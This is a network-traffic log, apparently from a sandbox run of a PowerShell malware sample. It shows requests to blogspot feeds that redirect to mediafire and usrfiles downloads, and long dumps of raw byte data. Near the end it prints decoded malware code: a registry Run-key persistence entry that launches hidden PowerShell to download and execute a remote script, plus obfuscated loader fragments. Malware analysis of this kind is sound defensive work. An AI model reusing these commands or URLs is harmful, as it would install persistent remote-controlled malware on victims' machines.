                                                                                                                                                                      2022-01-14 11:20:24 UTC206INData Raw: 2c 35 34 2c 32 33 31 2c 31 33 31 2c 31 37 34 2c 36 32 2c 31 32 30 2c 32 33 32 2c 33 38 2c 32 31 37 2c 38 2c 31 35 33 2c 31 31 33 2c 36 30 2c 31 37 32 2c 31 37 36 2c 32 33 2c 33 37 2c 34 31 2c 32 30 36 2c 31 34 35 2c 32 33 34 2c 33 30 2c 37 33 2c 34 31 2c 35 37 2c 32 33 34 2c 33 30 2c 31 33 39 2c 32 31 35 2c 31 32 36 2c 36 2c 31 36 38 2c 32 31 2c 31 36 2c 32 34 38 2c 31 39 32 2c 31 32 35 2c 32 30 39 2c 31 38 36 2c 37 38 2c 35 36 2c 32 34 37 2c 31 36 36 2c 32 32 31 2c 39 37 2c 32 38 2c 37 39 2c 31 33 35 2c 31 34 34 2c 32 34 34 2c 33 36 2c 38 30 2c 31 38 34 2c 31 39 31 2c 31 32 33 2c 31 38 38 2c 31 31 36 2c 32 32 32 2c 37 37 2c 31 38 31 2c 36 2c 31 34 35 2c 31 37 39 2c 31 30 2c 32 30 36 2c 37 2c 31 36 33 2c 37 34 2c 31 37 35 2c 32 34 30 2c 31 30 35 2c 31 32
                                                                                                                                                                      Data Ascii: ,54,231,131,174,62,120,232,38,217,8,153,113,60,172,176,23,37,41,206,145,234,30,73,41,57,234,30,139,215,126,6,168,21,16,248,192,125,209,186,78,56,247,166,221,97,28,79,135,144,244,36,80,184,191,123,188,116,222,77,181,6,145,179,10,206,7,163,74,175,240,105,12
                                                                                                                                                                      2022-01-14 11:20:24 UTC222INData Raw: 37 2c 31 39 32 2c 32 31 30 2c 35 39 2c 35 37 2c 32 32 2c 31 31 30 2c 32 30 39 2c 31 31 2c 31 30 39 2c 36 38 2c 31 30 34 2c 34 2c 31 38 30 2c 39 39 2c 31 34 30 2c 31 33 35 2c 37 31 2c 31 31 30 2c 36 37 2c 37 33 2c 31 38 2c 31 39 34 2c 32 34 31 2c 31 36 2c 37 33 2c 38 34 2c 38 37 2c 32 30 33 2c 38 38 2c 31 38 39 2c 31 38 2c 32 37 2c 31 36 33 2c 38 37 2c 35 30 2c 32 35 32 2c 32 2c 31 39 34 2c 39 34 2c 32 31 35 2c 31 37 30 2c 32 33 39 2c 31 38 39 2c 37 39 2c 33 32 2c 37 38 2c 38 33 2c 31 38 32 2c 31 37 30 2c 31 32 33 2c 31 32 34 2c 32 31 37 2c 32 31 2c 31 37 30 2c 31 30 35 2c 32 39 2c 32 38 2c 34 33 2c 32 33 38 2c 31 39 2c 32 33 33 2c 33 39 2c 38 32 2c 32 30 2c 33 34 2c 33 35 2c 31 36 2c 38 32 2c 32 30 32 2c 31 31 2c 32 31 32 2c 32 33 34 2c 38 37 2c 32 31 33
                                                                                                                                                                      Data Ascii: 7,192,210,59,57,22,110,209,11,109,68,104,4,180,99,140,135,71,110,67,73,18,194,241,16,73,84,87,203,88,189,18,27,163,87,50,252,2,194,94,215,170,239,189,79,32,78,83,182,170,123,124,217,21,170,105,29,28,43,238,19,233,39,82,20,34,35,16,82,202,11,212,234,87,213
                                                                                                                                                                      2022-01-14 11:20:24 UTC238INData Raw: 37 2c 33 30 2c 31 34 33 2c 31 35 39 2c 36 31 2c 32 34 38 2c 37 37 2c 32 34 36 2c 32 32 38 2c 32 31 33 2c 32 33 38 2c 38 35 2c 36 30 2c 32 31 2c 36 33 2c 31 32 33 2c 32 32 37 2c 31 36 31 2c 35 30 2c 38 31 2c 31 39 38 2c 31 33 30 2c 32 31 30 2c 32 33 31 2c 31 34 39 2c 32 34 36 2c 31 34 34 2c 31 39 36 2c 35 37 2c 31 33 34 2c 31 34 2c 33 32 2c 31 31 35 2c 34 30 2c 38 32 2c 38 39 2c 31 36 32 2c 35 38 2c 31 31 32 2c 33 31 2c 31 33 30 2c 31 34 33 2c 32 32 39 2c 31 37 31 2c 31 36 31 2c 31 34 2c 37 2c 32 33 37 2c 35 30 2c 31 35 39 2c 31 39 2c 31 38 34 2c 39 39 2c 37 31 2c 31 39 2c 31 38 2c 31 37 30 2c 31 30 33 2c 34 36 2c 37 33 2c 34 37 2c 39 36 2c 32 31 31 2c 32 33 31 2c 35 2c 39 31 2c 36 37 2c 32 30 30 2c 31 32 32 2c 34 34 2c 31 36 38 2c 39 34 2c 31 32 30 2c 32
                                                                                                                                                                      Data Ascii: 7,30,143,159,61,248,77,246,228,213,238,85,60,21,63,123,227,161,50,81,198,130,210,231,149,246,144,196,57,134,14,32,115,40,82,89,162,58,112,31,130,143,229,171,161,14,7,237,50,159,19,184,99,71,19,18,170,103,46,73,47,96,211,231,5,91,67,200,122,44,168,94,120,2
                                                                                                                                                                      2022-01-14 11:20:24 UTC254INData Raw: 2c 32 37 2c 39 2c 32 32 36 2c 31 39 39 2c 31 38 34 2c 31 35 31 2c 31 39 34 2c 32 34 36 2c 35 38 2c 36 35 2c 36 33 2c 31 32 39 2c 36 36 2c 32 34 32 2c 31 34 38 2c 31 32 33 2c 33 37 2c 31 34 36 2c 31 30 37 2c 38 30 2c 34 30 2c 31 30 35 2c 31 32 35 2c 31 39 2c 31 36 36 2c 32 33 35 2c 32 31 35 2c 39 39 2c 33 2c 34 34 2c 37 35 2c 39 30 2c 31 33 36 2c 31 30 30 2c 31 30 34 2c 31 37 33 2c 31 39 37 2c 31 37 30 2c 32 35 33 2c 34 32 2c 31 39 36 2c 31 36 32 2c 32 30 35 2c 34 35 2c 32 30 35 2c 32 31 34 2c 32 30 32 2c 37 37 2c 31 35 30 2c 32 30 38 2c 39 31 2c 31 31 36 2c 31 37 30 2c 31 30 34 2c 32 34 38 2c 36 2c 31 31 34 2c 33 38 2c 32 30 36 2c 31 33 2c 31 37 35 2c 38 32 2c 31 33 37 2c 32 30 39 2c 31 38 37 2c 31 37 2c 33 33 2c 31 30 34 2c 32 30 32 2c 32 32 33 2c 31 39
                                                                                                                                                                      Data Ascii: ,27,9,226,199,184,151,194,246,58,65,63,129,66,242,148,123,37,146,107,80,40,105,125,19,166,235,215,99,3,44,75,90,136,100,104,173,197,170,253,42,196,162,205,45,205,214,202,77,150,208,91,116,170,104,248,6,114,38,206,13,175,82,137,209,187,17,33,104,202,223,19
                                                                                                                                                                      2022-01-14 11:20:24 UTC270INData Raw: 31 39 2c 38 32 2c 38 31 2c 31 30 34 2c 31 34 36 2c 37 39 2c 34 38 2c 31 36 38 2c 39 38 2c 32 32 38 2c 31 33 36 2c 32 32 35 2c 39 36 2c 32 31 38 2c 38 38 2c 31 31 31 2c 35 32 2c 31 39 36 2c 33 32 2c 31 31 32 2c 31 39 33 2c 33 37 2c 31 37 36 2c 31 38 37 2c 32 2c 31 31 38 2c 32 31 35 2c 32 30 39 2c 39 36 2c 31 37 32 2c 31 34 31 2c 31 33 33 2c 31 37 35 2c 38 38 2c 31 34 39 2c 36 33 2c 31 37 38 2c 31 39 32 2c 32 32 30 2c 33 38 2c 31 30 34 2c 32 32 32 2c 31 36 34 2c 35 33 2c 36 30 2c 31 30 36 2c 31 38 38 2c 31 38 2c 31 35 34 2c 32 32 30 2c 31 39 30 2c 37 32 2c 31 32 39 2c 31 2c 33 38 2c 31 2c 31 34 33 2c 31 36 39 2c 32 35 34 2c 31 33 31 2c 32 2c 31 34 2c 31 38 2c 31 38 37 2c 34 32 2c 32 35 32 2c 31 33 33 2c 32 37 2c 32 2c 37 31 2c 32 32 34 2c 35 37 2c 31 34 36
                                                                                                                                                                      Data Ascii: 19,82,81,104,146,79,48,168,98,228,136,225,96,218,88,111,52,196,32,112,193,37,176,187,2,118,215,209,96,172,141,133,175,88,149,63,178,192,220,38,104,222,164,53,60,106,188,18,154,220,190,72,129,1,38,1,143,169,254,131,2,14,18,187,42,252,133,27,2,71,224,57,146
                                                                                                                                                                      2022-01-14 11:20:24 UTC286INData Raw: 32 35 35 2c 36 37 2c 32 35 31 2c 31 34 33 2c 31 32 30 2c 38 38 2c 32 31 36 2c 35 2c 31 32 32 2c 32 38 2c 32 33 2c 35 34 2c 32 34 30 2c 32 34 30 2c 35 37 2c 31 37 36 2c 32 32 31 2c 31 39 39 2c 32 35 31 2c 32 30 38 2c 31 37 37 2c 32 32 37 2c 31 34 2c 31 2c 31 35 38 2c 36 32 2c 32 33 31 2c 32 30 37 2c 31 35 38 2c 36 33 2c 31 30 39 2c 32 33 38 2c 31 32 36 2c 37 38 2c 31 33 36 2c 37 39 2c 38 39 2c 31 35 34 2c 31 33 34 2c 37 39 2c 31 34 34 2c 31 33 38 2c 38 31 2c 39 31 2c 31 33 33 2c 31 34 31 2c 31 34 36 2c 38 33 2c 39 35 2c 31 33 32 2c 31 34 33 2c 31 35 33 2c 31 39 39 2c 32 31 36 2c 32 30 30 2c 32 30 34 2c 36 35 2c 32 37 2c 31 39 37 2c 37 39 2c 31 33 31 2c 31 30 32 2c 31 36 37 2c 35 34 2c 32 31 32 2c 35 39 2c 37 31 2c 34 33 2c 31 38 38 2c 36 39 2c 36 38 2c 31
                                                                                                                                                                      Data Ascii: 255,67,251,143,120,88,216,5,122,28,23,54,240,240,57,176,221,199,251,208,177,227,14,1,158,62,231,207,158,63,109,238,126,78,136,79,89,154,134,79,144,138,81,91,133,141,146,83,95,132,143,153,199,216,200,204,65,27,197,79,131,102,167,54,212,59,71,43,188,69,68,1
                                                                                                                                                                      2022-01-14 11:20:24 UTC302INData Raw: 31 39 37 2c 31 38 37 2c 31 39 35 2c 31 39 2c 32 32 37 2c 31 32 35 2c 37 39 2c 31 39 38 2c 37 31 2c 32 33 30 2c 31 32 36 2c 36 32 2c 32 34 38 2c 35 37 2c 32 35 35 2c 31 30 39 2c 32 34 36 2c 32 33 33 2c 32 30 32 2c 32 30 34 2c 32 32 30 2c 32 34 30 2c 32 30 38 2c 32 30 38 2c 31 34 33 2c 32 30 39 2c 33 31 2c 33 35 2c 31 38 33 2c 31 33 30 2c 31 37 34 2c 36 39 2c 32 34 35 2c 37 2c 39 35 2c 37 35 2c 31 33 37 2c 31 35 2c 31 34 31 2c 31 32 31 2c 32 38 2c 33 31 2c 31 32 32 2c 35 31 2c 32 35 34 2c 37 34 2c 32 33 36 2c 31 34 39 2c 31 33 32 2c 31 30 37 2c 31 33 37 2c 32 33 33 2c 31 34 35 2c 31 37 37 2c 31 36 39 2c 32 33 2c 39 35 2c 32 34 35 2c 32 34 37 2c 31 32 36 2c 32 33 36 2c 32 30 33 2c 32 30 36 2c 31 37 33 2c 31 37 34 2c 32 30 31 2c 31 37 31 2c 31 33 37 2c 31 37
                                                                                                                                                                      Data Ascii: 197,187,195,19,227,125,79,198,71,230,126,62,248,57,255,109,246,233,202,204,220,240,208,208,143,209,31,35,183,130,174,69,245,7,95,75,137,15,141,121,28,31,122,51,254,74,236,149,132,107,137,233,145,177,169,23,95,245,247,126,236,203,206,173,174,201,171,137,17
                                                                                                                                                                      2022-01-14 11:20:25 UTC305INData Raw: 30 2c 31 36 37 2c 32 34 37 2c 39 30 2c 32 37 2c 35 38 2c 32 33 38 2c 31 38 30 2c 31 37 36 2c 31 38 31 2c 35 30 2c 31 37 38 2c 31 31 39 2c 31 34 34 2c 32 32 31 2c 32 33 33 2c 31 31 38 2c 32 33 34 2c 31 36 30 2c 31 37 31 2c 32 35 31 2c 31 37 37 2c 36 37 2c 37 2c 31 33 2c 31 35 37 2c 31 34 32 2c 32 38 2c 32 34 35 2c 35 37 2c 31 32 31 2c 32 31 32 2c 31 32 35 2c 32 33 35 2c 31 32 36 2c 37 39 2c 35 35 2c 32 35 33 2c 32 32 37 2c 33 30 2c 32 35 32 2c 37 36 2c 31 38 38 2c 38 32 2c 32 30 2c 31 30 32 2c 31 35 34 2c 31 32 2c 31 37 32 2c 34 34 2c 39 32 2c 37 36 2c 32 38 2c 31 34 38 2c 31 36 32 2c 31 30 2c 32 31 30 2c 32 34 36 2c 31 37 30 2c 32 32 30 2c 31 38 30 2c 35 36 2c 36 32 2c 31 32 36 2c 31 32 2c 36 33 2c 39 30 2c 31 33 32 2c 31 33 38 2c 31 35 35 2c 31 35 37 2c
                                                                                                                                                                      Data Ascii: 0,167,247,90,27,58,238,180,176,181,50,178,119,144,221,233,118,234,160,171,251,177,67,7,13,157,142,28,245,57,121,212,125,235,126,79,55,253,227,30,252,76,188,82,20,102,154,12,172,44,92,76,28,148,162,10,210,246,170,220,180,56,62,126,12,63,90,132,138,155,157,
                                                                                                                                                                      2022-01-14 11:20:25 UTC321INData Raw: 32 35 31 2c 31 38 36 2c 32 35 30 2c 32 35 30 2c 31 33 36 2c 32 31 32 2c 32 30 30 2c 31 34 34 2c 32 31 35 2c 31 31 37 2c 32 39 2c 31 37 35 2c 35 39 2c 32 33 34 2c 31 38 2c 31 32 33 2c 32 33 35 2c 39 31 2c 32 32 32 2c 31 39 39 2c 31 38 38 2c 31 30 35 2c 32 33 37 2c 32 33 34 2c 31 32 32 2c 31 34 36 2c 34 38 2c 32 31 32 2c 32 35 31 2c 32 34 31 2c 32 35 33 2c 32 33 31 2c 31 39 37 2c 31 35 36 2c 32 30 31 2c 32 33 33 2c 31 33 33 2c 32 30 31 2c 32 33 33 2c 31 36 31 2c 31 31 31 2c 31 35 39 2c 32 33 39 2c 31 32 34 2c 32 36 2c 32 35 31 2c 35 37 2c 31 38 32 2c 34 38 2c 32 32 31 2c 32 32 30 2c 32 31 35 2c 32 35 30 2c 31 37 38 2c 32 34 37 2c 37 37 2c 31 32 33 2c 38 37 2c 32 34 31 2c 32 34 38 2c 31 30 30 2c 31 31 38 2c 39 37 2c 37 35 2c 37 39 2c 32 35 32 2c 36 34 2c 39
                                                                                                                                                                      Data Ascii: 251,186,250,250,136,212,200,144,215,117,29,175,59,234,18,123,235,91,222,199,188,105,237,234,122,146,48,212,251,241,253,231,197,156,201,233,133,201,233,161,111,159,239,124,26,251,57,182,48,221,220,215,250,178,247,77,123,87,241,248,100,118,97,75,79,252,64,9
                                                                                                                                                                      2022-01-14 11:20:25 UTC337INData Raw: 37 31 2c 31 2c 32 30 34 2c 31 30 30 2c 32 32 35 2c 37 31 2c 31 30 36 2c 31 37 38 2c 32 34 30 2c 32 35 2c 31 35 34 2c 37 36 2c 32 30 33 2c 37 36 2c 39 33 2c 38 38 2c 32 32 33 2c 31 37 38 2c 31 35 38 2c 31 30 38 2c 33 36 2c 31 31 33 2c 32 39 2c 31 32 30 2c 31 34 35 2c 31 36 38 2c 39 37 2c 34 34 2c 31 33 2c 32 33 31 2c 31 34 31 2c 31 31 35 2c 35 38 2c 31 35 32 2c 31 34 33 2c 31 38 35 2c 32 30 35 2c 31 39 34 2c 32 35 2c 31 35 38 2c 31 33 31 2c 34 35 2c 34 37 2c 32 30 30 2c 32 33 37 2c 33 38 2c 32 32 36 2c 38 30 2c 32 32 36 2c 35 38 2c 31 37 36 2c 33 39 2c 31 32 33 2c 31 34 35 2c 31 32 30 2c 38 31 2c 31 38 32 2c 39 35 2c 31 39 33 2c 34 30 2c 36 37 2c 34 39 2c 32 30 32 2c 31 33 39 2c 32 34 2c 32 32 39 2c 36 39 2c 31 34 30 2c 31 39 34 2c 31 32 31 2c 31 34 33 2c
                                                                                                                                                                      Data Ascii: 71,1,204,100,225,71,106,178,240,25,154,76,203,76,93,88,223,178,158,108,36,113,29,120,145,168,97,44,13,231,141,115,58,152,143,185,205,194,25,158,131,45,47,200,237,38,226,80,226,58,176,39,123,145,120,81,182,95,193,40,67,49,202,139,24,229,69,140,194,121,143,
                                                                                                                                                                      2022-01-14 11:20:25 UTC353INData Raw: 2c 32 31 38 2c 31 39 36 2c 32 32 38 2c 31 38 35 2c 35 35 2c 31 36 32 2c 32 30 37 2c 31 34 33 2c 33 34 2c 32 31 37 2c 31 2c 32 30 31 2c 38 32 2c 31 30 35 2c 39 33 2c 39 37 2c 31 37 31 2c 31 36 35 2c 32 34 35 2c 31 33 30 2c 32 39 2c 31 34 38 2c 31 35 30 2c 31 35 2c 31 37 31 2c 31 34 37 2c 35 34 2c 31 36 2c 32 32 2c 32 34 2c 34 31 2c 31 30 38 2c 38 2c 34 34 2c 37 31 2c 32 31 38 2c 38 2c 38 38 2c 31 37 37 2c 31 38 30 2c 39 38 2c 32 31 36 2c 32 32 36 2c 32 30 30 2c 32 35 30 2c 38 39 2c 31 31 39 2c 31 36 32 2c 32 30 39 2c 31 38 33 2c 31 39 36 2c 31 33 36 2c 32 31 38 2c 31 32 30 2c 31 37 30 2c 32 34 39 2c 31 37 39 2c 38 33 2c 32 31 30 2c 33 38 2c 31 39 35 2c 39 32 2c 39 38 2c 31 33 33 2c 37 37 2c 31 33 35 2c 33 37 2c 37 33 2c 34 33 2c 31 33 31 2c 32 31 2c 31 39
                                                                                                                                                                      Data Ascii: ,218,196,228,185,55,162,207,143,34,217,1,201,82,105,93,97,171,165,245,130,29,148,150,15,171,147,54,16,22,24,41,108,8,44,71,218,8,88,177,180,98,216,226,200,250,89,119,162,209,183,196,136,218,120,170,249,179,83,210,38,195,92,98,133,77,135,37,73,43,131,21,19
2022-01-14 11:20:25 UTC | 479 | IN | Data Ascii: GTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG =Get-DecompressedByteArray $STRDYFUGIHUYTYRTESRDYUGIRIstart-sleep -s 4$FGCHJBKHVGCFHJVBKNBHVGJB = D4FD5C5B9266824C4EEFRWEOIURWDQWOIDUQW389C83E0C69FD3FAAG -TypeName 'System.Collections.ArrayList';$FGCHJBKHVGCFHJVB


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49825 | 142.250.186.129 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-14 11:21:09 UTC | 481 | OUT | GET /atom.xml HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: p6tbbb.blogspot.com
                                                                                                                                                                      Connection: Keep-Alive
2022-01-14 11:21:09 UTC | 481 | IN | HTTP/1.1 302 Found
                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                      ETag: W/"76994fcf688c1d67e3733d8c335322d774ccdec6a6cee5a150ea445829fd35f1"
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:09 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Server: blogger-renderd
                                                                                                                                                                      Expires: Fri, 14 Jan 2022 11:21:10 GMT
                                                                                                                                                                      Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      Location: https://www.mediafire.com/file/5avuvurhf9r42y3/6.dll/file
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49824 | 142.250.186.129 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-14 11:21:09 UTC | 482 | OUT | GET /atom.xml HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: p26ynn.blogspot.com
                                                                                                                                                                      Connection: Keep-Alive
2022-01-14 11:21:09 UTC | 482 | IN | HTTP/1.1 302 Found
                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                      ETag: W/"653e6214c6f62902c0acee3c8515402071ab5658902f4c9106cea3b71f4569ba"
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:09 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Server: blogger-renderd
                                                                                                                                                                      Expires: Fri, 14 Jan 2022 11:21:10 GMT
                                                                                                                                                                      Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      Location: https://5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com/ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txt
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49827 | 104.16.203.237 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-14 11:21:09 UTC | 482 | OUT | GET /file/5avuvurhf9r42y3/6.dll/file HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: www.mediafire.com
                                                                                                                                                                      Connection: Keep-Alive
2022-01-14 11:21:10 UTC | 484 | IN | HTTP/1.1 302 Found
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:10 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: ukey=8gv80wkxqbda9mv7zrd52a2eanmh8cy0; expires=Tue, 14-Jan-2042 11:21:10 GMT; Max-Age=631152000; path=/; domain=.mediafire.com; HttpOnly
                                                                                                                                                                      Strict-Transport-Security: max-age=0
                                                                                                                                                                      Access-Control-Allow-Origin: https://www.mediafire.com
                                                                                                                                                                      Location: https://download2262.mediafire.com/u45xa78x9nkg/5avuvurhf9r42y3/6.dll
                                                                                                                                                                      Report-To: {"group": "mediafirenel", "max_age": 86400, "include_subdomains": true, "endpoints": [{"url": "https://browser-reports.mediafire.dev/network-error"}]}
                                                                                                                                                                      NEL: {"report_to": "mediafirenel", "max_age": 86400, "include_subdomains": true, "failure_fraction": 0.01}
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                      Set-Cookie: __cf_bm=XI5bmwp1fM4BVc1oedBSbCz0KJS4GOtl71yJudGWoMk-1642159270-0-AcWwPmLhePabExPENyClMc6ZzNv7QOucaFmTrlsiSmflpf0J8p5ZWfOaiMfTdHZn36LLBvnV7Fk6K/btz9ZD1Rc=; path=/; expires=Fri, 14-Jan-22 11:51:10 GMT; domain=.mediafire.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 6cd67aac9c6e4e9d-FRA
2022-01-14 11:21:10 UTC | 485 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49828 | 34.102.176.152 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-14 11:21:10 UTC | 483 | OUT | GET /ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txt HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: 5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com
                                                                                                                                                                      Connection: Keep-Alive
2022-01-14 11:21:10 UTC | 483 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: openresty/1.19.9.1
                                                                                                                                                                      Content-Length: 205
                                                                                                                                                                      X-GUploader-UploadID: ADPycdukVOdsfESFZvaCgG1hbnOfR6smYI0ENYixz6KNvC_-TOgdQeNQs0_RIjxPcjUE7TuPSRc2HOjNGVx3BUHw1Xw
                                                                                                                                                                      x-goog-generation: 1641283569604910
                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                      x-goog-stored-content-length: 205
                                                                                                                                                                      x-goog-hash: crc32c=Yki6tg==
                                                                                                                                                                      x-goog-hash: md5=kcThf3Ys+9gTpJY1lKTwcA==
                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                      Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                      Timing-Allow-Origin: *
                                                                                                                                                                      X-Seen-By: gcp.us-central-1.media-router-5ffcd6b674-mj9x7
                                                                                                                                                                      X-Robots-Tag: noindex, nofollow
                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                      Date: Wed, 12 Jan 2022 03:07:30 GMT
                                                                                                                                                                      Expires: Wed, 12 Jan 2022 04:07:30 GMT
                                                                                                                                                                      Cache-Control: public, max-age=15552000, immutable
                                                                                                                                                                      Age: 202420
                                                                                                                                                                      Last-Modified: Tue, 04 Jan 2022 08:06:09 GMT
                                                                                                                                                                      ETag: "91c4e17f762cfbd813a4963594a4f070"
                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close
2022-01-14 11:21:10 UTC | 484 | IN | Data Ascii: <HTML><HTML><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><HEAD><script language="VBScript">window.resizeTo 0, 0self.close</script></head><body></bod
2022-01-14 11:21:10 UTC | 484 | IN | Data Ascii: y></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.3 | 49829 | 199.91.155.3 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-14 11:21:10 UTC | 485 | OUT | GET /u45xa78x9nkg/5avuvurhf9r42y3/6.dll HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: download2262.mediafire.com
                                                                                                                                                                      Cookie: ukey=8gv80wkxqbda9mv7zrd52a2eanmh8cy0
                                                                                                                                                                      Connection: Keep-Alive
2022-01-14 11:21:11 UTC | 486 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      server: dsp-0.0.1
                                                                                                                                                                      content-type: text/plain
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      connection: close
                                                                                                                                                                      content-encoding: binary
                                                                                                                                                                      cache-control: no-store
                                                                                                                                                                      x-robots-tag: noindex, nofollow
                                                                                                                                                                      content-disposition: attachment; filename="6.dll"
                                                                                                                                                                      content-length: 490941
                                                                                                                                                                      date: Fri, 14 Jan 2022 11:21:11 GMT
2022-01-14 11:21:11 UTC | 486 | IN | Data Raw: 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 35 0d 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74 79 20 2d 50 61 74 68 20 22 48 4b 43 55 3a 5c 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 52 75 6e 22 20 2d 4e 61 6d 65 20 22 4e 65 74 77 72 69 78 50 61 72 61 6d 22 20 2d 56 61 6c 75 65 20 22 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 20 68 20 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 42 79 70 61 73 73 20 2d 43 6f 6d 6d 61 6e 64 20 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 32 30 3b 69 77 72 20 22 22 68 74 74 70 73 3a 2f 2f 70 36 74 62 62 62 2e 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2f 61 74 6f 6d 2e 78 6d 6c 22 22 20 2d 75 73 65 42 7c 69 65
Data Ascii: start-sleep -s 5New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "NetwrixParam" -Value "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""https://p6tbbb.blogspot.com/atom.xml"" -useB|ie
                                                                                                                                                                      Data Ascii: ,148,40,119,105,181,149,162,104,105,147,82,165,180,165,165,165,85,165,212,84,106,138,162,166,247,90,223,181,66,122,223,239,243,188,251,143,183,191,223,249,100,125,246,245,221,107,173,189,247,218,251,156,112,71,168,93,109,218,110,242,100,7,136,78,236,161,1
